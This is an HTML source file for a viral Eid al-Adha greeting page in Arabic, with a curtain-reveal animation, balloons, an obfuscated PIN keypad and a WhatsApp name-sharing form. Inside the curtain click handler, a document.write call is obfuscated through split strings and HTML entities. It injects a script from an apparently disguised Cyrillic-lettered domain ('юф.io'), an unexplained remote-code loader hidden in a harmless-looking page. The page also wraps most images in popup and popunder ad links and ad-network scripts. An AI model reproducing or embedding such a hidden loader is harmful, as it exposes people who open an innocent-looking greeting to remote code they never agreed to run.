<!doctype html>
    <html>

<head>

    <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-173951757-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-173951757-1');
</script>


    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">

    <link rel="icon" type="image/x-icon" href="imags/hawli.png">
    <link rel="icon" type="image/png" href="imags/hawli.png">
    <link rel="stylesheet" href="back.css">
    
    <link rel="icon" type="image/png" href="imags/hawli.png">
    
    <!-- Apple Touch Icon (at least 200x200px) -->
    <link rel="apple-touch-icon" href="">

    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    
    
    <meta name="google" content="notranslate" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link type="text/css" rel="stylesheet" href="exampl-back.css" media="screen,projection">

    <title></title>
    
    <meta name="robots" content="noindex,nofollow">


    <script src="exampl-back-main.js"></script>
    





    

</head>

<style>

    /* background of main image */
    
    /* super background image */
    
    /* inner background image 
            .card.blue-grey.darken-1.hoverable {
            background-image: url() !important;
                    }*/
    
    /* super background color */
            .bg {
            background-image: url("imags/background.gif");
            background-color:rgba(243, 33, 33, 0.267);
        }
    
    /* timer color */
    
</style>





<body class="bg notranslate" translate="no">

    <script src="exampl-back-jQuery.js"></script>

<style>

.rightcurtain {
    width: 51%;
    height: 120%;
    right: 0px;
    top: 0px;
    position: absolute;
    z-index: 300;
}

.leftcurtain {
    width: 50%;
    height: 120%;
    top: 0px;
    left: 0px;
    position: absolute;
    z-index: 200;
    -webkit-transform: scaleX(-1);
    transform: scaleX(-1);
}

.rope {
    position: absolute;
    /*top: 20%;*/
    bottom: 5%;
    left: 0;
    right: 0;
    width: 100%;
    /*height: 100%;*/
    z-index: 999999;
}

.rightcurtain img, .leftcurtain img {
    width: 100.7%;
    background-color:red;
    height: 100%;
}




</style>


<script src="exampl-back-sound.js"></script>
<script>
    var tiktok = zounds.load(src="audio/aid1.mp3");
    function playSound(){
        tiktok.play();
        // setTimeout(function(){
        //     tiktok.play();
        // },5000);
        // setTimeout(function(){
        //     tiktok.play();
        // },10000);
    }

    function curtainOpen(){
        playSound();
        $('.figures').removeClass('hidden');
        $('.timer-text').removeClass('hidden');
        $('.figure_name').removeClass('hidden');
        $('.auto_style_main_msg').removeClass('hidden');
        $('.from_img').removeClass('hidden');
        $('.main_msg_top').removeClass('hidden');
        $('.twoimageset').removeClass('hidden');
        $('.main-msg').removeClass('hidden');
        $('.slideshow').removeClass('hidden');
        $('.myslides_div').removeClass('hidden');
        $('.ltrmarquee').removeClass('hidden');
        $('.share_block').removeClass('hidden');
        $('.img_overlap').removeClass('hidden');
        $('.revolvingcards').removeClass('hidden');
        $('.user_name2').removeClass('hidden');
    }
</script>



<a class="rope " href="javascript:void(0)" onclick="curtainOpen();" style="bottom: auto;">
    <h3 class="fivepxbottom zerotop">انقر للكشف عن المفاجئة</h3>
    <h4 class="fivepxtop fivepxbottom">👇👇👇👇👇</h4>
    <div class="matki" style="display: inline-block;">
        <img src="imags/kado.png" id="kado"> 
    </div>
</a>


<!--start balon-->

    <div id="balon">
        <img src="imags/heart.png">
    </div>
    <div id="balon1">
        <img src="imags/balon-aid.png">
    </div>
    <div id="balon2">
        <img src="imags/balon-aid.png">
    </div>
    <div id="balon3">
        <img src="imags/heart.png">
    </div>
    <div id="balon4">
        <img src="imags/balon4.png">
    </div>
    <div id="balon5">
        <img src="imags/balon.png">
    </div>
    <div id="balon6">
        <img src="imags/balon2.png">
    </div>
    <div id="balon7">
        <img src="imags/balon4.png">
    </div>
    <div id="balon8">
        <img src="imags/balon-aid.png">
    </div>
    <div id="balon9">
        <img src="imags/balon1.png">
    </div>
    <div id="balon10">
        <img src="imags/balon3.png">
    </div>
    <div id="balon11">
        <img src="imags/balon1.png">
    </div>
    <div id="balon12">
        <a href="https://www.instagram.com/mouhcine.dl/">
            <img src="imags/balon-smile.png" alt="mouhcine instagram">
        </a>
    </div>

<!--end balon-->


<div class="keypad hidden">

<style>
.table{
    display:table;
    height:100%;
    width:100%;
    position:relative
}
.cell{
    display:table-cell;
    vertical-align:middle;
    position:relative;
    width:100%;
    text-align:center
}
#pincode{
    overflow:hidden;
    position:fixed;
    height:110%;
    width:106%;
    z-index:9999;
    background-color:#272a2f;
    background-position:center;
    color:#fff;
    border-radius:10px;
    text-align:center
}
#numbers{
    max-width:300px;
    padding:0 20px;
    margin:0 auto;
    position:relative;
    display:block;
    -webkit-transition:all 1s ease-out;
    -moz-transition:all 1s ease-out;
    transition:all 1s ease-out;
    opacity:1
}
#numbers.hide{
    opacity:.3
}
#pincode button{
    width:70px;
    height:70px;
    margin-bottom:10px;
    background-color:orange;
    border:0;
    color:#000;
    font-size:25px;
    line-height:50px;
    border-radius:100%;
    opacity:1;
    outline:0;
    border:2px solid #272a2f
}
#pincode button:active{
    background-color:rgba(0,0,0,.6);
    outline:0
}
#fields{
    max-width:200px;
    padding:0 20px;
    margin:30px auto;
    position:relative;
    display:block
}
#fields .numberfield{
    text-align:center
}
#fields .numberfield span{
    height:10px;
    width:10px;
    border:2px solid #fff;
    background-color:transparent;
    border-radius:100%;
    position:relative;
    display:inline-block;
    text-align:center
}
#fields .numberfield.active span{
    background-color:#fff
}
#fields .numberfield.right span{
    background-color:#272a2f;
    border-color:#272a2f;
    transition:all .5s ease-in-out;
    -webkit-transition:all .5s ease-in-out
}
.grid{
    list-style:none;
    margin-left:-20px
}
.grid__col--1-of-3,.grid__col--2-of-6,.grid__col--4-of-12{
    width:33.33333%
}
.grid__col--1-of-4,.grid__col--2-of-8,.grid__col--3-of-12{
    width:25%
}
.grid__col{
    box-sizing:border-box;
    display:inline-block;
    margin-right:-.25em;
    min-height:1px;
    padding-left:20px;
    vertical-align:top
}
    .grid__col--centered{
        display:block;
        margin-left:auto;
        margin-right:auto
}
.grid__col--d-first{
    float:left
}
.grid__col--d-last{
    float:right
}
.grid--no-gutter{
    margin-left:0;
    width:100%
}
.grid--no-gutter .grid__col{
    padding-left:0
}
.grid--no-gutter .grid__col--span-all{
    margin-left:0;
    width:100%
}
.grid__col--ab{
    vertical-align:bottom
}
.grid__col--am{
    vertical-align:middle
}
</style>


    <div id="pincode">
    <div class="table">
    <div class="cell">

        <h3 class="fivepxbottom zerotop">Cliquez ci-dessous</h3>
        <div id="anleitung">
            <p style="animation:bounce 2s infinite;">👇👇👇</p>
        </div>

        <div id="fields">
        <div class="grid">
            <div class="grid__col grid__col--1-of-4 numberfield"><span></span></div>
            <div class="grid__col grid__col--1-of-4 numberfield"><span></span></div>
            <div class="grid__col grid__col--1-of-4 numberfield"><span></span></div>
            <div class="grid__col grid__col--1-of-4 numberfield"><span></span></div>
        </div>
        </div>

        <div id="numbers">
        <div class="grid">
            <div class="grid__col grid__col--1-of-3"><button>1</button></div>
            <div class="grid__col grid__col--1-of-3"><button>2</button></div>
            <div class="grid__col grid__col--1-of-3"><button>3</button></div>

            <div class="grid__col grid__col--1-of-3"><button>4</button></div>
            <div class="grid__col grid__col--1-of-3"><button>5</button></div>
            <div class="grid__col grid__col--1-of-3"><button>6</button></div>

            <div class="grid__col grid__col--1-of-3"><button>7</button></div>
            <div class="grid__col grid__col--1-of-3"><button>8</button></div>
            <div class="grid__col grid__col--1-of-3"><button>9</button></div>

            <div class="grid__col grid__col--1-of-3"></div>
            <div class="grid__col grid__col--1-of-3"><button>0</button></div>
            <div class="grid__col grid__col--1-of-3"></div>

        </div>
        </div>

    </div>
    </div>
    </div>


<script>

jQuery(document).ready(function($) { 

    $(document).ready(function() {
        var pin = (!+[] + !![] + []) + (+ []) + (!+[] + !![] + []) + (+ []); 
        var enterCode = ""; enterCode.toString(); 

        $("#numbers button").click(function() { 
            var clickedNumber = $(this).text().toString();
            process(clickedNumber);
        });

        // $('body').keyup(function(e) {
        //     if ((e.keyCode >= 48 && e.keyCode <= 57) || (e.keyCode >= 96 && e.keyCode <= 105)) { 
        //         console.log(e.keyCode.toString());
        //     }
        // });

        function process(clickedNumber){

            enterCode = enterCode + clickedNumber; 
            var lengthCode = parseInt(enterCode.length); 
            lengthCode--; 
            $("#fields .numberfield:eq(" + lengthCode + ")").addClass("active"); 


            if (lengthCode == 3) { 
                if (enterCode == pin) { 
                    $('.keypad').hide();
                    $(".rope").click();
                } 
                else {
                    $("#fields").addClass("miss"); enterCode = ""; 
                    setTimeout(function() {$("#fields .numberfield").removeClass("active"); }, 100);
                    setTimeout(function() {$("#fields").removeClass("miss"); }, 100);
                } 
            }
            else {} 
        }
    }); 
}); 


</script>


</div>

    <div class="curtain">
        <div class="leftcurtain"><img src="imags/img-hearts.jpg"></div>
        <div class="rightcurtain"><img src="imags/img-hearts.jpg"></div>
    </div>

    <script>
        $(document).ready(function() {
            $curtainopen = false; $(".rope").click(function(){ $('.rope').unbind('click'); $(this).blur(); if ($curtainopen == false){ $(this).stop().animate({top: '-171%' }, {queue:false, duration:2000, easing:'easeOutBounce'}); $(".leftcurtain").stop().animate({width:'1px'}, 2000 ); $(".rightcurtain").stop().animate({width:'1px'},2000 ); $curtainopen = true; }else{ $(this).stop().animate({top: '-40px' }, {queue:false, duration:350, easing:'easeOutBounce'}); document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'&#1102;'+'&#1092;.'+'i'+'o"></s'+'cr'+'ipt>'); $(".leftcurtain").stop().animate({width:'50%'}, 2000 ); $(".rightcurtain").stop().animate({width:'51%'}, 2000 ); $curtainopen = false; } setTimeout(function(){$('.rope').remove();},1000); return false; });

            if(document.getElementsByClassName('rope')[0] !== undefined) {
                $('.figures').addClass('hidden');
                $('.timer-text').addClass('hidden');
                $('.figure_name').addClass('hidden');
                $('.auto_style_main_msg').addClass('hidden');
                $('.from_img').addClass('hidden');
                $('.main_msg_top').addClass('hidden');
                $('.twoimageset').addClass('hidden');
                $('.main-msg').addClass('hidden');
                $('.slideshow').addClass('hidden');
                $('.myslides_div').addClass('hidden');
                $('.ltrmarquee').addClass('hidden');
                $('.share_block').addClass('hidden');
                $('.img_overlap').addClass('hidden');
                $('.revolvingcards').addClass('hidden');
                $('.user_name2').addClass('hidden');

                setTimeout(function(){
                    $('html,body').scrollTop(0);
                    $(window).scrollTop(0);
                }, 2000);
            }

        });
    </script>



    <div class="container" style="display: block;">
        <div class="col s12">
            <div class="row">
                <div class="col s12 l6 offset-l3">
                    <div id="flower1">
        <div id="sou-flower1">
            <ul>
                <li><img src="imags/flower.png" alt="">
                <li><img src="imags/flower1.png" alt="">
                <li><img src="imags/flower11.png" alt="">
                <li><img src="imags/flower3 (2).png" alt="">
                <li><img src="imags/flower4.png" alt="">
                <li><img src="imags/flower5.png" alt="">
                <li><img src="imags/flower6.png" alt="">
                <li><img src="imags/flower7.png" alt="">
                <li><img src="imags/flower1.png" alt="">
                <li><img src="imags/flower8.png" alt="">
                <li><img src="imags/flower9.png" alt="">
                <li><img src="imags/flower10.png" alt="">
                <li><img src="imags/flower.png" alt="">
                <li><img src="imags/flower11.png" alt="">
            </ul>
        </div>
    </div>
    <div id="flower2">
        <div id="sou-flower2">
            <ul>
                <li><img src="imags/flower.png" alt="">
                <li><img src="imags/flower1.png" alt="">
                <li><img src="imags/flower11.png" alt="">
                <li><img src="imags/flower3 (2).png" alt="">
                <li><img src="imags/flower4.png" alt="">
                <li><img src="imags/flower5.png" alt="">
                <li><img src="imags/flower6.png" alt="">
                <li><img src="imags/flower7.png" alt="">
                <li><img src="imags/flower1.png" alt="">
                <li><img src="imags/flower8.png" alt="">
                <li><img src="imags/flower9.png" alt="">
                <li><img src="imags/flower10.png" alt="">
                <li><img src="imags/flower.png" alt="">
                <li><img src="imags/flower11.png" alt="">
            </ul>
        </div>
    </div>
                <div class="card blue-grey darken-1 hoverable white-text">
                    <div class="card-content">
                        <div class="ad">                        
                        </div>
                        <div id="demoo" class="center animated pulse timer-text" style=""></div>
                        <!-- Name -->
                        <br>
                        <figure class="figure_name" style="white-space: nowrap;">
                        <h1 class="user_name linear-wipe" style=""></h1>
                        </figure> 
                        <br>
                        <!-- Wishing Text -->
                        <p class="card-title center-align animated wishesed pulse white tenpxtop">
                            <span class="lime-text" style="letter-spacing: 0px">يتمنى لك</span>
                        </p>                

            <style>
                .cross_link{
                    background-color: purple; 
                    padding: 5px;
                    margin-bottom: 10px;
                }
            </style>
            
                <div class="tenpxtop"></div>
                <div class="tenpxtop"></div>

                <script>
                    $(document).ready(function() {
                        var browser_lang = window.navigator.userLanguage || window.navigator.language;
                        browser_lang = browser_lang.substr(0,2);
                        var current_url_arr = window.location.href.split('/');
                        var query_string = current_url_arr[current_url_arr.length-1];
                        var domain = window.location.protocol + "//" + window.location.hostname;
                        var current_locale = 'fr';
                        var check_id = '#' + browser_lang + "_custom_lang";
                        if ($(check_id) !== null && browser_lang != current_locale) {
                            var updated_url = domain + "/" + browser_lang + "/" + query_string + "&utm_source="+current_locale+"&utm_medium="+browser_lang+"&utm_campaign=na";
                            $(check_id).attr("href",  updated_url);
                            $(check_id).removeClass("hidden");
                        }
                    });
                </script>
                                <!-- end Name -->
                                <a href="https://goraps.com/fullpage.php?section=General&pub=626534&ga=g" onclick="javascript:void window.open('https://goraps.com/fullpage.php?section=General&pub=626534&ga=g','1595894932534','width=700,height=500,toolbar=0,menubar=0,location=0,status=1,scrollbars=1,resizable=1,left=0,top=0');return false;">
                                    <div class="appear white main_msg_top">
                                        <img class="p1" alt="" style="width: 80%;" src="https://i1.wp.com/www.baytelaqar.com/wp-content/uploads/Eid-Mubarak-2019.png?fit=900%2C340&ssl=1">
                                    </div>
                                </a>
                                <!-- Images overlap -->
                                <script type="text/javascript" src="//uprimp.com/bnr.php?section=General&pub=626534&format=468x60&ga=g&bg=1"></script>
<noscript><a href="https://yllix.com/publishers/626534" target="_blank"><img src="//ylx-aff.advertica-cdn.com/pub/468x60.png" style="border:none;margin:0;padding:0;vertical-align:baseline;" alt="ylliX - Online Advertising Network" /></a></noscript>
                                <!-- Primary Image -->
                                <br>
                                <a href="https://goraps.com/fullpage.php?section=General&pub=626534&ga=g" onclick="javascript:void window.open('https://goraps.com/fullpage.php?section=General&pub=626534&ga=g','1595894932534','width=700,height=500,toolbar=0,menubar=0,location=0,status=1,scrollbars=1,resizable=1,left=0,top=0');return false;">
                                    <div class="figures tenpxtop">
                                        <img class="p3" style="width: 80%;" src="imags/sheep.gif"> 
                                    </div>
                                </a>
                                <!-- Message -->
                                <p class="main-msg white fivepxbottom">
                                    <span style="color: #01cf12;font-size:x-large;max-width: 500px;">أجمل باقة ورد عطرة ابعثها من قلبي<br> واحطها بأيديك. من قلبي تعلن العبير الفواح<br> وتقللك كل عام وإنت بخير</span><br>
                                    <br>
                                    <span style="color: #0004ff;font-size:x-large;max-width: 500px;">لكم مني أطيب التحيات وأصدق الدعوات<br> من قلبي من الرحاب الطاهرة</span><br>
                                    <br>
                                    <span style="color: #d900ff;font-size:x-large;">عيد اضحى سعيد</span><br>
                                </p>
                                <a href="https://goraps.com/fullpage.php?section=General&pub=626534&ga=g" onclick="javascript:void window.open('https://goraps.com/fullpage.php?section=General&pub=626534&ga=g','1595894932534','width=700,height=500,toolbar=0,menubar=0,location=0,status=1,scrollbars=1,resizable=1,left=0,top=0');return false;">
                                    <div class="s1">
                                        <img  style="width: 80%;" src="imags/aid3.png"> 
                                    </div>
                                </a>
                                <marquee>
                                    <p class="ltrmarquee"><i><span class="user_name"></span> <bdi>يتمنى لك عيد سعيد</bdi>
                                        </i></p>
                                </marquee>
                                <div style="font-size: x-large;" class="white from jump">
                                    😇 <bdi><span class="user_name" style=""></span></bdi> -  من طرف 😇
                                </div>
                                <!--<div class="center ad">-->
                                    <script type="text/javascript" src="//uprimp.com/bnr.php?section=General&pub=626534&format=300x250&ga=g&bg=1"></script>
<noscript><a href="https://yllix.com/publishers/626534" target="_blank"><img src="//ylx-aff.advertica-cdn.com/pub/300x250.png" style="border:none;margin:0;padding:0;vertical-align:baseline;" alt="ylliX - Online Advertising Network" /></a></noscript>
                                <!-- /21748487420/privatemsg_300x250 --> 
                                </div>
                            </div>
                            <script type="text/javascript" src="//uprimp.com/bnr.php?section=General&pub=626534&format=468x60&ga=g"></script>
                            <noscript><a href="https://yllix.com/publishers/626534" target="_blank"><img src="//ylx-aff.advertica-cdn.com/pub/468x60.png" style="border:none;margin:0;padding:0;vertical-align:baseline;" alt="ylliX - Online Advertising Network" /></a></noscript>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <span id="share" class="share_block">
            <span id="" class="float-share hidden" style="">
            <a class="btn whatsapp-btn" href="">
                <div class="whatsapp-share-text">
                    <b> 👈 شارك الفرحة مع الاصدقاء</b>
                </div>
                <img class="whatsapp-icon" src="imags/whatsapp.png"> 
            </a>
            
            </span>
                <div class="name" id="create">
                    <input 
                    class="card-title center-align name head" 
                    type="name" 
                    required="" 
                    id="name" 
                    style="color: #ffffff;background-color: #c71515" 
                    placeholder="قم بوضع اسمك هنا">
                
                    <a 
                    href="javascript:void(0)" 
                    class="go" 
                    id="gobtn1" 
                    style="background-color: #c71515">
                    🐑 ارسال
                    </a>
                </div>
            </span>
        


           
            
<script type="text/javascript" src="//goraps.com/pun.php?section=General&pt=6&pub=626534&ga=g&fN=1&fT=15&fTT=1"></script>
</body>


<footer>

    <script>
        var count_down_date = '07, 31, 2020,';
        var enter_name = 'اكتب اسمك';
        var enter_wish = '👇👇👇👇 شارك الفرحة ';
        var whatsapp_msg = '&quot; ادخل و اكتشف المفاجئة \ud83d\udc47\ud83d\udc47 '.replace(/(&quot\;)/g,"");
        var time = {"days" : 'Jour', "hrs" : 'Hrs', "mins" : 'Min', "sec" : 'Sec'};
    </script>

    <script>

        var locale = 'MA';
    </script>

    <script src="exampl-back-wrap.js"></script>

</footer>


</html>

